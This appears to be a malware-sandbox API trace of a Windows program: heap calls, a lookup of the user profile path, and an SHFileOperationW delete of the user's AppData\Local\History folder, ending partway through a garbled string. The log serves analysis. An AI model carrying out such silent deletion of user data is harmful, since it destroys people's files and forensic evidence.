hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0242.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.809] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0242.809] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.810] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0242.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x2417000 [0242.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/History", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History", lpFilePart=0x8bedfc*="History") returned 0x33 [0242.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0242.811] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history")) returned 0x2416 [0242.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1610011, ftLastAccessTime.dwLowDateTime=0x109b, ftLastAccessTime.dwHighDateTime=0x3e40031, ftLastWriteTime.dwLowDateTime=0x11e71, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0x109b, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0242.812] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0242.812] GetLastError () returned 0x6 [0242.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.812] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0242.813] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0242.813] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0242.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0242.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0242.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x2417000 [0242.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/History", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History", lpFilePart=0x8bf658*="History") returned 0x33 [0242.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0242.815] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history")) returned 0x2416 [0242.816] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a